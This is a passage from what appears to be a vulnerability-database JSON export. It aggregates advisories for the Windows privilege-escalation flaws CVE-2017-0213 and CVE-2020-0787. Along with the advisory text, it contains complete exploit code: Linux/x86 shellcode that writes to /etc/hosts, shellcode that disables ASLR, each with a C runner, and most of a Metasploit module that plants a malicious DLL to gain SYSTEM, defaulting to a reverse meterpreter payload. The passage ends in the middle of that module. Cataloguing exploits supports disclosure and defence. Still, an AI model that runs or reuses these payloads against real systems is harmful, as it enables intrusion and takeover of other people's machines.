Version 1607 for 32-bit Systems \n * Microsoft Windows 10 Version 1607 for x64-based Systems \n * Microsoft Windows 10 for 32-bit Systems \n * Microsoft Windows 10 for x64-based Systems \n * Microsoft Windows 10 version 1511 for 32-bit Systems \n * Microsoft Windows 10 version 1511 for x64-based Systems \n * Microsoft Windows 10 version 1703 for 32-bit Systems \n * Microsoft Windows 10 version 1703 for x64-based Systems \n * Microsoft Windows 7 for 32-bit Systems SP1 \n * Microsoft Windows 7 for x64-based Systems SP1 \n * Microsoft Windows 8.1 for 32-bit Systems \n * Microsoft Windows 8.1 for x64-based Systems \n * Microsoft Windows RT 8.1 \n * Microsoft Windows Server 2008 R2 for Itanium-based Systems SP1 \n * Microsoft Windows Server 2008 R2 for x64-based Systems SP1 \n * Microsoft Windows Server 2008 for 32-bit Systems SP2 \n * Microsoft Windows Server 2008 for Itanium-based Systems SP2 \n * Microsoft Windows Server 2008 for x64-based Systems SP2 \n * Microsoft Windows Server 2012 \n * Microsoft Windows Server 2012 R2 \n * Microsoft Windows Server 2016 \n\n### Recommendations\n\n**Permit local access for trusted individuals only. Where possible, use restricted environments and restricted shells.** \nTo exploit this vulnerability, an attacker requires local access to an affected computer. Grant local access for trusted and accountable users only.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "edition": 2, "cvss3": {}, "published": "2017-05-09T00:00:00", "type": "symantec", "title": "Microsoft Windows COM CVE-2017-0213 Local Privilege Escalation Vulnerability", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2017-0213"], "modified": "2017-05-09T00:00:00", "id": "SMNTC-98102", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/98102", "cvss": {"score": 1.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}], "cisa_kev": [{"lastseen": "2022-08-10T17:26:47", "description": "Microsoft Windows COM Aggregate Marshaler allows for privilege escalation when an attacker runs a specially crafted application.", "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 4.7, "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-03-28T00:00:00", "type": "cisa_kev", "title": "Microsoft Windows Privilege Escalation Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 1.9, "vectorString": "AV:L/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0213"], "modified": "2022-03-28T00:00:00", "id": "CISA-KEV-CVE-2017-0213", "href": "", "cvss": {"score": 1.9, "vector": "AV:L/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2022-08-10T17:26:47", "description": "Microsoft Windows BITS is vulnerable to to a privilege elevation vulnerability if it improperly handles symbolic links. An actor can exploit this vulnerability to execute arbitrary code with system-level privileges.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-01-28T00:00:00", "type": "cisa_kev", "title": "Microsoft Windows Background Intelligent Transfer Service (BITS) Improper Privilege Management Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0787"], "modified": "2022-01-28T00:00:00", "id": "CISA-KEV-CVE-2020-0787", "href": "", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "myhack58": [{"lastseen": "2017-06-08T06:18:38", "edition": 2, "description": "CVE-2017-0213 Windows COM elevation of privilege vulnerability components take a look at this vulnerability:\n\n<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0213>\n\nWindows COM Aggregate Marshaler in the realization of the presence of Privilege escalation vulnerability allows a remote attacker to elevate privileges to execute arbitrary code.\n\nVernacular: in package a COM component can provide the right\n\nMicrosoft's official said:\n\nElevation of privileges exists in the Windows COM package. An attacker successfully exploited the vulnerability could run arbitrary code with higher privileges. In order to exploit the vulnerability, an attacker could run a specially crafted application that could exploit the vulnerability. This vulnerability itself does not allow arbitrary code to run. However, the vulnerability may be associated with one or more vulnerabilities such as remote code execution vulnerabilities and the another privilege level, used together, can be in the running with elevated privileges.\n\nThe affected versions are as follows:\n\n| | | | \n---|---|---|--- \nProduct | Version | Update | Tested \nWindows 10 | | | \u221a \nWindows 10 | 1511 | | \nWindows 10 | 1607 | | \nWindows 10 | 1703 | | \u221a \nWindows 7 | | SP1 | \u221a \nWindows 8.1 | | | \nWindows RT 8.1 | | | \nWindows Server 2008 | | SP2 | \nWindows Server 2008 | R2 | SP1 | \nWindows Server 2012 | | | \nWindows Server 2012 | R2 | | \nWindows Server 2016 | | | \n\n**[1] [[2]](<86826_2.htm>) [next](<86826_2.htm>)**\n", "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "baseScore": 4.7, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2017-06-08T00:00:00", "title": "CVE-2017-0213 Windows COM elevation of privilege vulnerability-vulnerability warning-the black bar safety net", "type": "myhack58", "bulletinFamily": "info", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 1.9, "vectorString": "AV:L/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0213"], "modified": "2017-06-08T00:00:00", "id": "MYHACK58:62201786826", "href": "http://www.myhack58.com/Article/html/3/62/2017/86826.htm", "cvss": {"score": 1.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}], "0daydb": [{"lastseen": "2020-06-23T13:12:54", "description": "102 bytes small Linux/x86 add map in /etc/hosts file polymorphic shellcode.", "edition": 2, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-06-16T12:57:50", "title": "Linux/x86 /etc/hosts Mapping Add Polymorphic Shellcode", "type": "0daydb", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0787"], "modified": "2020-06-16T12:57:52", "id": "0DAYDB:E60701732169ACBFC7A4C97688260000", "href": "https://0daydb.com/linux-x86-etc-hosts-mapping-add-polymorphic-shellcode.html", "sourceData": "# Title: Linux/x86 - Add map in /etc/hosts file polymorphic shellcode ( 102 bytes )\n# Author: Xenofon Vassilakopoulos \n# Date: 2020-06-15\n# Tested on: Linux kali 5.3.0-kali2-686-pae #1 SMP Debian 5.3.9-3kali1 (2019-11-20) i686 GNU/Linux\n# Architecture: i686 GNU/Linux\n# Shellcode Length: 102 bytes\n# Original shellcode: http://shell-storm.org/shellcode/files/shellcode-893.php\n# SLAE-ID: SLAE - 1314 \n# Description: Adding a network map in /etc/hosts file \n\n------------------ ASM ------------------\n\nglobal _start\n\nsection .text\n\n_start:\n xor ecx, ecx\n xor edx, edx \n xor eax, eax\n mov DWORD [esp-0x4],ecx\n mov DWORD [esp-0x8],0x7374736f\n mov DWORD [esp-0xc],0x682f2f2f\n mov DWORD [esp-0x10],0x6374652f\n sub esp,0x10\n mov ebx,esp\n mov cx, 0x3b1 ;permmisions\n add cx, 0x50\n mov al, 0x5\n int 0x80 ;syscall to open file\n mov ebx, eax\n xor eax, eax\n jmp short _ldata ;jmp-call-pop technique to load the map\n\nwrite_data:\n pop ecx\n mov dl,0x12\n add dl,0x3\n mov al,0x4\n int 0x80 \n\n add al,0x2\n int 0x80 \n\n xor eax,eax\n mov al,0x1\n int 0x80 \n\n_ldata:\n call write_data\n message db \"127.1.1.1 google.com\",0x0A\n\n------------------ Shellcode ------------------\n\n\n#include <stdio.h>\n#include <string.h>\n\nunsigned char code[] = \\\n \"\\x31\\xc9\\x31\\xc0\\x89\\x4c\\x24\\xfc\\xc7\\x44\\x24\\xf8\\x6f\\x73\\x74\\x73\\xc7\\x44\\x24\"\n \"\\xf4\\x2f\\x2f\\x2f\\x68\\xc7\\x44\\x24\\xf0\\x2f\\x65\\x74\\x63\\x83\\xec\\x10\\x89\\xe3\\x66\"\n \"\\xb9\\xb1\\x03\\x66\\x83\\xc1\\x50\\xb0\\x05\\xcd\\x80\\x89\\xc3\\x31\\xc0\\xeb\\x14\\x59\\xb2\"\n \"\\x12\\x80\\xc2\\x02\\xb0\\x04\\xcd\\x80\\x04\\x02\\xcd\\x80\\x31\\xc0\\xb0\\x01\\xcd\\x80\\xe8\"\n \"\\xe7\\xff\\xff\\xff\\x31\\x32\\x37\\x2e\\x31\\x2e\\x31\\x2e\\x31\\x20\\x67\\x6f\\x6f\\x67\\x6c\"\n \"\\x65\\x2e\\x63\\x6f\\x6d\\x0a\\x0d\";\n\nint main()\n{\nprintf(\"Shellcode Length: %d\\n\", strlen(code));\n\nint (*ret)() = (int(*)())code;\n\nret();\n}", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-23T13:12:54", "description": "124 bytes small ASLR deactivation polymorphic shellcode.", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-06-12T13:13:42", "title": "Linux/x86 ASLR Deactivation Polymorphic - Shellcode", "type": "0daydb", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-7209", "CVE-2020-0787"], "modified": "2020-06-12T13:13:44", "id": "0DAYDB:C94508071E81EBFE1BF46F3EF3E4EDD3", "href": "https://0daydb.com/linux-x86-aslr-deactivation-polymorphic-shellcode.html", "sourceData": "# Title: Linux/x86 - ASLR deactivation polymorphic shellcode ( 124 bytes )\n# Author: Xenofon Vassilakopoulos \n# Date: 2020-06-11\n# Tested on: Linux 3.13.0-32-generic #57~precise1-Ubuntu i686 i386 GNU/Linux\n# Architecture: i686 GNU/Linux\n# Shellcode Length: 124 bytes\n# Original shellcode: http://shell-storm.org/shellcode/files/shellcode-813.php\n# SLAE-ID: SLAE - 1314 \n# Description: polymorphic version of ASLR deactivation shellcode\n\n\n------------------ ASLR deactivation ------------------\n\nglobal _start\n\nsection .text\n\n_start:\n xor ebx,ebx\n mul ebx\n mov DWORD [esp-0x4],eax\n mov DWORD [esp-0x8],0x65636170\n mov DWORD [esp-0xc],0x735f6176\n mov DWORD [esp-0x10],0x5f657a69\n mov DWORD [esp-0x14],0x6d6f646e\n mov DWORD [esp-0x18],0x61722f6c\n mov DWORD [esp-0x1c],0x656e7265\n mov DWORD [esp-0x20],0x6b2f7379\n mov DWORD [esp-0x24],0x732f636f\n mov DWORD [esp-0x28],0x72702f2f\n sub esp,0x28\n mov ebx,esp\n mov cx,0x301\n mov dx,0x2a1\n add dx,0x1b\n mov al, 0x5\n int 0x80\n mov ebx,eax\n push ebx\n mov cx,0x3b30\n push cx\n mov ecx,esp\n shr edx, 16\n inc edx\n mov al,0x4\n int 0x80\n mov al,0x1\n int 0x80\n\n------------------ shellcode ------------------\n\n\n#include <stdio.h>\n#include <string.h>\n\nunsigned char code[] = \\\n \"\\x31\\xdb\\xf7\\xe3\\x89\\x44\\x24\\xfc\\xc7\"\n \"\\x44\\x24\\xf8\\x70\\x61\\x63\\x65\\xc7\\x44\"\n \"\\x24\\xf4\\x76\\x61\\x5f\\x73\\xc7\\x44\\x24\"\n \"\\xf0\\x69\\x7a\\x65\\x5f\\xc7\\x44\\x24\\xec\"\n \"\\x6e\\x64\\x6f\\x6d\\xc7\\x44\\x24\\xe8\\x6c\"\n \"\\x2f\\x72\\x61\\xc7\\x44\\x24\\xe4\\x65\\x72\"\n \"\\x6e\\x65\\xc7\\x44\\x24\\xe0\\x79\\x73\\x2f\"\n \"\\x6b\\xc7\\x44\\x24\\xdc\\x6f\\x63\\x2f\\x73\"\n \"\\xc7\\x44\\x24\\xd8\\x2f\\x2f\\x70\\x72\\x83\"\n \"\\xec\\x28\\x89\\xe3\\x66\\xb9\\x01\\x03\\x66\"\n \"\\xba\\xa1\\x02\\x66\\x83\\xc2\\x1b\\xb0\\x05\"\n \"\\xcd\\x80\\x89\\xc3\\x53\\x66\\xb9\\x30\\x3b\"\n \"\\x66\\x51\\x89\\xe1\\xc1\\xea\\x10\\x42\\xb0\"\n \"\\x04\\xcd\\x80\\xb0\\x01\\xcd\\x80\";\n\nmain()\n{\nprintf(\"Shellcode Length: %d\\n\", strlen(code));\n\nint (*ret)() = (int(*)())code;\n\nret();\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-06-23T13:12:54", "description": "This Metasploit module exploits CVE-2020-0787, an arbitrary file move vulnerability", "edition": 2, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-06-12T13:15:16", "title": "Background Intelligent Transfer Service CVE-2020-0787 - Privilege Escalation", "type": "0daydb", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0688", "CVE-2020-0787"], "modified": "2020-06-12T13:15:52", "id": "0DAYDB:137B89027DF0ADFC87056CE176A77441", "href": "https://0daydb.com/cve-2020-0787.html", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = ExcellentRanking\n\n include Msf::Post::Windows::Priv\n include Msf::Exploit::EXE # Needed for generate_payload_dll\n include Msf::Post::Windows::FileSystem\n include Msf::Post::Windows::ReflectiveDLLInjection\n include Msf::Exploit::FileDropper\n include Msf::Post::File\n include Msf::Exploit::Remote::AutoCheck\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Background Intelligent Transfer Service Arbitrary File Move Privilege Elevation Vulnerability',\n 'Description' => %q{\n This module exploits CVE-2020-0787, an arbitrary file move vulnerability in outdated versions of the\n Background Intelligent Transfer Service (BITS), to overwrite C:\\Windows\\System32\\WindowsCoreDeviceInfo.dll\n with a malicious DLL containing the attacker's payload.\n\n To achieve code execution as the SYSTEM user, the Update Session Orchestrator service is then started, which\n will result in the malicious WindowsCoreDeviceInfo.dll being run with SYSTEM privileges due to a DLL hijacking\n issue within the Update Session Orchestrator Service.\n\n Note that presently this module only works on Windows 10 and Windows Server 2016 and later as the\n Update Session Orchestrator Service was only introduced in Windows 10. Note that only Windows 10 has been tested,\n so your mileage may vary on Windows Server 2016 and later.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'itm4n', # PoC\n 'gwillcox-r7' # msf module\n ],\n 'Platform' => ['win'],\n 'SessionTypes' => ['meterpreter'],\n 'Privileged' => true,\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Targets' =>\n [\n [ 'Windows DLL Dropper', { 'Arch' => [ARCH_X86, ARCH_X64], 'Type' => :windows_dropper } ],\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => '2020-03-10',\n 'References' =>\n [\n ['CVE', '2020-0787'],\n ['URL', 'https://itm4n.github.io/cve-2020-0787-windows-bits-eop/'],\n ['URL', 'https://github.com/itm4n/BitsArbitraryFileMove'],\n ['URL', 'https://attackerkb.com/assessments/e61cfec0-d766-4e7e-89f7-5aad2460afb8'],\n ['URL', 'https://googleprojectzero.blogspot.com/2018/04/windows-exploitation-tricks-exploiting.html'],\n ['URL', 'https://itm4n.github.io/usodllloader-part1/'],\n ['URL', 'https://itm4n.github.io/usodllloader-part2/'],\n ],\n 'Notes' =>\n {\n 'SideEffects' => [ ARTIFACTS_ON_DISK ],\n 'Reliability' => [ REPEATABLE_SESSION ],\n 'Stability' => [ CRASH_SAFE ]\n },\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'thread',\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp',\n 'WfsDelay' => 900\n }\n )\n )\n\n register_options([\n OptBool.new('OVERWRITE_DLL', [true, 'Overwrite WindowsCoreDeviceInfo.dll if it exists (false by default).', false]),\n OptInt.new('JOB_WAIT_TIME', [true, 'Time to wait for the BITS job to complete before starting the USO service to execute the uploaded payload, in seconds', 20])\n ])\n end\n\n def target_not_presently_supported\n print_warning('This target is not presently supported by this exploit. Support may be added in the future!')\n print_warning('Attempts to exploit this target with this module WILL NOT WORK!')\n end\n\n def check\n sysinfo_value = sysinfo['OS']\n\n if sysinfo_value !~ /windows/i\n # Non-Windows systems are definitely not affected.\n return CheckCode::Safe('Target is not a Windows system, so it is not affected by this vulnerability!')\n end\n\n # XXX Using session.shell_command_token over cmd_exec() here as @wvu-r7 noticed cmd_exec() was broken under some situations.\n build_num_raw = session.shell_command_token('cmd.exe /c ver')\n build_num = build_num_raw.match(/\\d+\\.\\d+\\.\\d+\\.\\d+/)\n if build_num.nil?\n print_error(\"Couldn't retrieve the target's build number!\")\n else\n build_num = build_num_raw.match(/\\d+\\.\\d+\\.\\d+\\.\\d+/)[0]\n print_status(\"Target's build number: #{build_num}\")\n end\n\n # see https://docs.microsoft.com/en-us/windows/release-information/\n unless sysinfo_value =~ /(7|8|8\\.1|10|2008|2012|2016|2019|1803|1903)/\n return CheckCode::Safe('Target is not running a vulnerable version of Windows!')\n end\n\n build_num_gemversion = Gem::Version.new(build_num)\n\n # Build numbers taken from https://www.qualys.com/research/security-alerts/2020-03-10/microsoft/\n if (build_num_gemversion >= Gem::Version.new('10.0.18363.0')) && (build_num_gemversion < Gem::Version.new('10.0.18363.719')) # Windows 10 v1909\n return CheckCode::Appears('Vulnerable Windows 10 v1909 build detected!')\n elsif (build_num_gemversion >= Gem::Version.new('10.0.18362.0')) && (build_num_gemversion < Gem::Version.new('10.0.18362.719')) # Windows 10 v1903\n return CheckCode::Appears('Vulnerable Windows 10 v1903 build detected!')\n elsif (build_num_gemversion >= Gem::Version.new('10.0.17763.0')) && (build_num_gemversion < Gem::Version.new('10.0.17763.1098')) # Windows 10 v1809\n return CheckCode::Appears('Vulnerable Windows 10 v1809 build detected!')\n elsif (build_num_gemversion >= Gem::Version.new('10.0.17134.0')) && (build_num_gemversion < Gem::Version.new('10.0.17134.1365')) # Windows 10 v1803\n return CheckCode::Appears('Vulnerable Windows 10 v1803 build detected!')\n elsif (build_num_gemversion >= Gem::Version.new('10.0.16299.0')) && (build_num_gemversion < Gem::Version.new('10.0.16299.1747')) # Windows 10 v1709\n return CheckCode::Appears('Vulnerable Windows 10 v1709 build detected!')\n elsif (build_num_gemversion >= Gem::Version.new('10.0.15063.0')) && (build_num_gemversion < Gem::Version.new('10.0.15063.2313')) # Windows 10 v1703\n return CheckCode::Appears('Vulnerable Windows 10 v1703 build detected!')\n elsif (build_num_gemversion >= Gem::Version.new('10.0.14393.0')) && (build_num_gemversion < Gem::Version.new('10.0.14393.3564')) # Windows 10 v1607\n return CheckCode::Appears('Vulnerable Windows 10 v1607 build detected!')\n elsif (build_num_gemversion >= Gem::Version.new('10.0.10586.0')) && (build_num_gemversion < Gem::Version.new('10.0.10586.9999999')) # Windows 10 v1511\n return CheckCode::Appears('Vulnerable Windows 10 v1511 build detected!')\n elsif (build_num_gemversion >= Gem::Version.new('10.0.10240.0')) && (build_num_gemversion < Gem::Version.new('10.0.10240.18519')) # Windows 10 v1507\n return CheckCode::Appears('Vulnerable Windows 10 v1507 build detected!')\n elsif (build_num_gemversion >= Gem::Version.new('6.3.9600.0')) && (build_num_gemversion < Gem::Version.new('6.3.9600.19665')) # Windows 8.1/Windows Server 2012 R2\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 8.1/Windows Server 2012 R2 build detected!')\n elsif (build_num_gemversion >= Gem::Version.new('6.2.9200.0')) && (build_num_gemversion < Gem::Version.new('6.2.9200.23009')) # Windows 8/Windows Server 2012\n target_not_presently_supported\n return CheckCode::AppearsAppears('Vulnerable Windows 8/Windows Server 2012 build detected!')\n elsif (build_num_gemversion >= Gem::Version.new('6.1.7600.0')) && (build_num_gemversion < Gem::Version.new('6.1.7601.24549')) # Windows 7/Windows Server 2008 R2\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 7/Windows Server 2008 R2 build detected!')\n elsif (build_num_gemversion >= Gem::Version.new('6.0.6001.0')) && (build_num_gemversion < Gem::Version.new('6.0.6003.20749')) # Windows Server 2008/Windows Server 2008 SP2\n target_not_presently_supported\n return CheckCode::Appears('Windows Server 2008/Windows Server 2008 SP2 build detected!')\n else\n return CheckCode::Safe('The build number of the target machine does not appear to be a vulnerable version!')\n end\n end\n\n def check_target_is_running_supported_windows_version\n if sysinfo['OS'].match('Windows').nil?\n fail_with(Failure::NotVulnerable, 'Target is not running Windows!')\n elsif sysinfo['OS'].match('Windows 10').nil? && sysinfo['OS'].match('Windows Server 2016').nil? && sysinfo['OS'].match('Windows Server 2019').nil?\n fail_with(Failure::BadConfig, 'Target is running Windows, its not a version this module supports! Bailing...')\n end\n end\n\n def check_target_and_payload_match_and_supported(client_arch)\n if (client_arch != ARCH_X64) && (client_arch != ARCH_X86)\n fail_with(Failure::BadConfig, 'This exploit currently only supports x86 and x64 targets!')\n end\n payload_arch = payload.arch.first # TODO: Add missing documentation for payload.arch, @wvu used this first but it is not documented anywhere.\n if (payload_arch != ARCH_X64) && (payload_arch != ARCH_X86)\n fail_with(Failure::BadConfig, \"Unsupported payload architecture (#{payload_arch})\") # Unsupported architecture, so return an error.\n end\n if ((client_arch == ARCH_X64) && (payload_arch != ARCH_X64)) || ((client_arch == ARCH_X86) && (payload_arch != ARCH_X86))\n fail_with(Failure::BadConfig, \"Payload architecture (#{payload_arch}) doesn't match the architecture of the target (#{client_arch})!\")\n end\n end\n\n def check_windowscoredeviceinfo_dll_exists_on_target\n # Taken from bwatters-r7's cve-2020-0688_service_tracing.rb code.\n #\n # We are going to overwrite the WindowsCoreDeviceInfo.dll DLL as part of our exploit.\n # The second part of this exploit will trigger a Update Session to be created so that this DLL\n # is loaded, which will result in arbitrary code execution as SYSTEM.\n #\n # To prevent any errors, we will first check that this file doesn't exist and ask the user if they are sure\n # that they want to overwrite the file.\n win_dir = session.sys.config.getenv('windir')\n normal_target_payload_pathname = \"#{win_dir}\\\\System32\\\\WindowsCoreDeviceInfo.dll\"\n wow64_target_payload_pathname = \"#{win_dir}\\\\Sysnative\\\\WindowsCoreDeviceInfo.dll\"\n wow64_existing_file = \"#{win_dir}\\\\Sysnative\\\\win32k.sys\"\n if file?(wow64_existing_file)\n if file?(wow64_target_payload_pathname)\n print_warning(\"#{wow64_target_payload_pathname} already exists\")\n print_warning('If it is in use, the overwrite will fail')\n unless datastore['OVERWRITE_DLL']\n print_error('Change OVERWRITE_DLL option to true if you would like to proceed.')\n fail_with(Failure::BadConfig, \"#{wow64_target_payload_pathname} already exists and OVERWRITE_DLL option is false\")\n end\n end\n target_payload_pathname = wow64_target_payload_pathname\n elsif file?(normal_target_payload_pathname)\n print_warning(\"#{normal_target_payload_pathname} already exists\")\n print_warning('If it is in use, the overwrite will fail')\n unless datastore['OVERWRITE_DLL']\n print_error('Change OVERWRITE_DLL option to true if you would like to proceed.')\n fail_with(Failure::BadConfig, \"#{normal_target_payload_pathname} already exists and OVERWRITE_DLL option is false\")\n end\n target_payload_pathname = normal_target_payload_pathname\n end\n target_payload_pathname\n end\n\n def launch_background_injectable_notepad\n print_status('Launching notepad to host the exploit...')\n notepad_process = client.sys.process.execute('notepad.exe', nil, 'Hidden' => true)\n process = client.sys.process.open(notepad_process.pid, PROCESS_ALL_ACCESS)\n print_good(\"Process #{process.pid} launched.\")\n process\n rescue Rex::Post::Meterpreter::RequestError\n # Sandboxes could not allow to create a new process\n # stdapi_sys_process_execute: Operation failed: Access is denied.\n print_error('Operation failed. Trying to elevate the current process...')\n process = client.sys.process.open\n process\n end\n\n def exploit\n # NOTE: Automatic check is implemented by the AutoCheck mixin\n super\n\n # Step 1: Check target environment is correct.\n print_status('Step #1: Checking target environment...')\n if is_system?\n fail_with(Failure::None, 'Session is already elevated')\n end\n client_arch = sysinfo['Architecture']\n check_target_is_running_supported_windows_version\n check_target_and_payload_match_and_supported(client_arch)\n check_windowscoredeviceinfo_dll_exists_on_target\n\n # Step 2: Generate the malicious DLL and upload it to a temp location.\n print_status('Step #2: Generating the malicious DLL...')\n path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2020-0787')\n datastore['EXE::Path'] = path\n if client_arch =~ /x86/i\n datastore['EXE::Template'] = ::File.join(path, 'template_x86_windows.dll')\n library_path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2020-0787', 'CVE-2020-0787.x86.dll')\n library_path = ::File.expand_path(library_path)\n elsif client_arch =~ /x64/i\n datastore['EXE::Template'] = ::File.join(path, 'template_x64_windows.dll')\n library_path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2020-0787', 'CVE-2020-0787.x64.dll')\n library_path = ::File.expand_path(library_path)\n end\n\n payload_dll = generate_payload_dll\n print_status(\"Payload DLL is #{payload_dll.length} bytes long\")\n temp_directory = session.sys.config.getenv('%TEMP%')\n malicious_dll_location = \"#{temp_directory}\\\\\" + Rex::Text.rand_text_alpha(6..13) + '.dll'\n write_file(malicious_dll_location, payload_dll)\n 